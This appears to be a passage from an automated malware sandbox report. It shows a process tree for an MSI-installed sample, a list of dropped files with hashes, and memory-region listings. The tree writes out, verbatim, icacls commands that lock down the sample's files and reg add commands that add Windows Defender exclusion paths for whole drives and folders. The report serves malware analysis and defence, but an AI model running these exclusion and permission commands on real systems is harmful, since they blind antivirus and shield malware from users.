                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4420
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\FKOGrh.exe" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:1272
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\FKOGrh.exe" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2644
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\FKOGrh.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:5940
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\FKOGrh.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2596
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\FKOGrh.exe" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:656
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\FKOGrh.exe" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4888
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\image.png" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:2132
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\image.png" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:4396
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4764
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4324
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:1532
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:5092
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\thumbs.db" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:3996
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\thumbs.db" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:4264
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:5788
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:5716
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:4564
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\thumbs.db" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:624
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\XPSPLOG.dll" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:3768
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\XPSPLOG.dll" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        PID:1940
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:4884
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\XPSPLOG.dll" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:5732
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\FKOGrh\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:5816
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\FKOGrh\XPSPLOG.dll" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:5564
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                  1⤵
                                  • Executes a command shell one-liner
                                  • Suspicious use of WriteProcessMemory
                                  PID:1412
                                  • C:\Windows\system32\reg.exe
                                    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                    2⤵
                                    • Windows security bypass
                                    PID:4840
                                • C:\Windows\system32\cmd.exe
                                  cmd.exe
                                  1⤵
                                    PID:2416
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:4272
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:3296
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:4932
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:4716
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:4524
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:3692
                                  • C:\Program Files (x86)\FKOGrh\FKOGrh.exe
                                    "C:\Program Files (x86)\FKOGrh\FKOGrh.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    PID:5916
                                  • C:\Program Files (x86)\FKOGrh\FKOGrh.exe
                                    "C:\Program Files (x86)\FKOGrh\FKOGrh.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:2724
                                  • C:\Program Files (x86)\2FO80m3t\T9Cbo6.exe
                                    "C:\Program Files (x86)\2FO80m3t\T9Cbo6.exe"
                                    1⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:5980
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\FKOGrh" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    PID:3908
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\FKOGrh" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:5148

                                  Network

                                        MITRE ATT&CK Enterprise v16

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        e5825c4.rbs

                                        • Path C:\Config.Msi\e5825c4.rbs
                                        • Size 7KB
                                        • SHA256 d67261bd9a2112d135d078c89c8ef9b4f64c11b09e0755ec53f275b82eb99385
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        XPSPLOG.dll

                                        • Path C:\Program Files (x86)\2FO80m3t\XPSPLOG.dll
                                        • Size 4.6MB
                                        • SHA256 9fb0176d86f428c5987ef2855566e5684ae2efeacb9cadb67545785a4617a007
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        image.png

                                        • Path C:\Program Files (x86)\2FO80m3t\image.png
                                        • Size 5.0MB
                                        • SHA256 c99cb3cf604753dde417cd5b7a11bd7506d4ad1cdb049f8724573f2e1736e7ec
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        FKOGrh.exe

                                        • Path C:\Program Files (x86)\FKOGrh\FKOGrh.exe
                                        • Size 145KB
                                        • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        XPSPLOG.dll

                                        • Path C:\Program Files (x86)\FKOGrh\XPSPLOG.dll
                                        • Size 4.6MB
                                        • SHA256 2b4a4b238b64cfea3bdaf263e5db042aea391c2376ffc4a0ed291a8bf9697833
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        image.png

                                        • Path C:\Program Files (x86)\FKOGrh\image.png
                                        • Size 5.0MB
                                        • SHA256 89ae76371d72697503b8354c59069f38838563633124c9eacb18c5dcb03fa40d
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        thumbs.db

                                        • Path C:\Program Files (x86)\FKOGrh\thumbs.db
                                        • Size 358KB
                                        • SHA256 7bcc8dfc25abfcc4bac2e85d88a3b3ddcb54515af89c05b3ed79fcaf93f73f90
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        __PSScriptPolicyTest_cdthwo2o.4ga.ps1

                                        • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdthwo2o.4ga.ps1
                                        • Size 60B
                                        • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                        • MD5 SHA1 SHA512 TLSH

                                        destopbak.ini

                                        • Path C:\Users\Public\Music\destopbak.ini
                                        • Size 2B
                                        • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                        • MD5 SHA1 SHA512

                                        EydnEY.exe

                                        • Path C:\Users\Public\wARGav\EydnEY.exe
                                        • Size 135KB
                                        • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        UxEnhance64.dll

                                        • Path C:\Users\Public\wARGav\UxEnhance64.dll
                                        • Size 3.1MB
                                        • SHA256 74f3a2d9eb1e6c07a04b3d1d52ea529a5ec9c1c692f6921eca148099ee2f2bf4
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        adoresd.dat

                                        • Path C:\Users\Public\wARGav\adoresd.dat
                                        • Size 4.7MB
                                        • SHA256 793e99e4d6bda7114bacb90782b3121d452397607cea6c72e52cb99a760ac271
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        msadox.tb

                                        • Path C:\Users\Public\wARGav\msadox.tb
                                        • Size 8KB
                                        • SHA256 3051e257cf338394fe335cdf3466b468d2a2de0a1835394768715a17de4d27fa
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        MSI2789.tmp

                                        • Path C:\Windows\Installer\MSI2789.tmp
                                        • Size 6.8MB
                                        • SHA256 99c4cc89c0322b357536b7110aad0837d0e88a6418981798db45f1be9883f120
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        e5825c3.msi

                                        • Path C:\Windows\Installer\e5825c3.msi
                                        • Size 6.8MB
                                        • SHA256 0d6bea573c356522d3981523c4d66c39c3bddc65103f542a4e8f6cf499ef5592
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        metadata-2

                                        • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                        • Size 24.1MB
                                        • SHA256 8320adae4febbc763e351b61739c3942c8af72b666730b020fc3713a09e8cec3
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        {f12fa795-558e-4c01-a18c-d3de3a430530}_OnDiskSnapshotProp

                                        • Path \??\Volume{12d9ef41-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f12fa795-558e-4c01-a18c-d3de3a430530}_OnDiskSnapshotProp
                                        • Size 6KB
                                        • SHA256 ebe3b877bbb8fd2bc802cff4617d933fbccfca85990ce5c8f1461353a0518e7c
                                        • MD5 SHA1 SHA512 SSDEEP TLSH

                                        xxxx.ini

                                        • Path \??\c:\xxxx.ini
                                        • Size 2B
                                        • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                        • MD5 SHA1 SHA512

                                        memory/1016-38-0x00007FFBD9470000-0x00007FFBD9480000-memory.dmp

                                        memory/1016-16-0x00007FFBD9470000-0x00007FFBD9480000-memory.dmp

                                        memory/1016-14-0x00007FFBC68B0000-0x00007FFBC6EF7000-memory.dmp

                                        memory/1016-12-0x00007FFBE4D30000-0x00007FFBE4D32000-memory.dmp

                                        memory/1300-72-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-67-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-80-0x000001C827390000-0x000001C82741A000-memory.dmp

                                        memory/1300-79-0x000001C827390000-0x000001C82741A000-memory.dmp

                                        memory/1300-78-0x000001C827390000-0x000001C82741A000-memory.dmp

                                        memory/1300-86-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-77-0x000001C826040000-0x000001C82608E000-memory.dmp

                                        memory/1300-87-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-52-0x00007FFBE4D30000-0x00007FFBE4D32000-memory.dmp

                                        memory/1300-60-0x00007FFBE4D40000-0x00007FFBE4D42000-memory.dmp

                                        memory/1300-68-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-81-0x000001C827390000-0x000001C82741A000-memory.dmp

                                        memory/1300-66-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-53-0x00007FFBC5AD0000-0x00007FFBC5FEE000-memory.dmp

                                        memory/1300-58-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-65-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/1300-61-0x000001C826AF0000-0x000001C827381000-memory.dmp

                                        memory/2724-268-0x0000000003BD0000-0x00000000043D7000-memory.dmp

                                        memory/2724-252-0x0000000003BD0000-0x00000000043D7000-memory.dmp

                                        memory/2724-267-0x0000000003030000-0x0000000003031000-memory.dmp

                                        memory/2724-272-0x0000000003010000-0x0000000003011000-memory.dmp

                                        memory/2724-242-0x0000000003010000-0x0000000003011000-memory.dmp

                                        memory/2724-243-0x0000000075100000-0x000000007584A000-memory.dmp

                                        memory/3232-195-0x0000000003770000-0x0000000003F77000-memory.dmp

                                        memory/3232-183-0x0000000003770000-0x0000000003F77000-memory.dmp

                                        memory/3232-228-0x0000000003770000-0x0000000003F77000-memory.dmp

                                        memory/3232-203-0x0000000010000000-0x0000000010061000-memory.dmp

                                        memory/3232-194-0x00000000040C0000-0x00000000040D4000-memory.dmp

                                        memory/3232-175-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                                        memory/3232-187-0x0000000003770000-0x0000000003F77000-memory.dmp

                                        memory/3232-281-0x0000000003770000-0x0000000003F77000-memory.dmp

                                        memory/3232-182-0x0000000001010000-0x0000000001011000-memory.dmp

                                        memory/3232-176-0x0000000075100000-0x000000007584A000-memory.dmp

                                        memory/3232-180-0x0000000003770000-0x0000000003F77000-memory.dmp

                                        memory/4852-299-0x000000006F400000-0x000000006F44C000-memory.dmp

                                        memory/4852-312-0x0000000007AA0000-0x0000000007B36000-memory.dmp

                                        memory/4852-296-0x0000000006510000-0x000000000652E000-memory.dmp

                                        memory/4852-309-0x0000000007E60000-0x00000000084DA000-memory.dmp

                                        memory/4852-310-0x0000000007820000-0x000000000783A000-memory.dmp

                                        memory/4852-311-0x0000000007890000-0x000000000789A000-memory.dmp

                                        memory/4852-307-0x0000000006AC0000-0x0000000006ADE000-memory.dmp

                                        memory/4852-298-0x00000000074D0000-0x0000000007502000-memory.dmp

                                        memory/4852-297-0x00000000065A0000-0x00000000065EC000-memory.dmp

                                        memory/4852-308-0x0000000007710000-0x00000000077B3000-memory.dmp

                                        memory/4852-283-0x0000000002F50000-0x0000000002F86000-memory.dmp

                                        memory/4852-284-0x00000000055E0000-0x0000000005C08000-memory.dmp

                                        memory/4852-285-0x0000000005C60000-0x0000000005C82000-memory.dmp

                                        memory/4852-313-0x0000000007A20000-0x0000000007A31000-memory.dmp

                                        memory/4852-292-0x0000000005EA0000-0x0000000005F06000-memory.dmp

                                        memory/4852-291-0x0000000005D80000-0x0000000005DE6000-memory.dmp

                                        memory/4852-293-0x0000000005F10000-0x0000000006264000-memory.dmp

                                        memory/5916-238-0x0000000003A40000-0x0000000004247000-memory.dmp

                                        memory/5916-263-0x0000000001420000-0x0000000001421000-memory.dmp

                                        memory/5916-269-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                                        memory/5916-264-0x0000000003A40000-0x0000000004247000-memory.dmp

                                        memory/5916-233-0x0000000075100000-0x000000007584A000-memory.dmp

                                        memory/5980-273-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

                                        memory/5980-274-0x0000000003CA0000-0x00000000044A7000-memory.dmp

                                        memory/5980-277-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

                                        memory/5980-246-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

                                        memory/5980-247-0x0000000072E10000-0x000000007355A000-memory.dmp

                                        memory/5980-254-0x0000000003CA0000-0x00000000044A7000-memory.dmp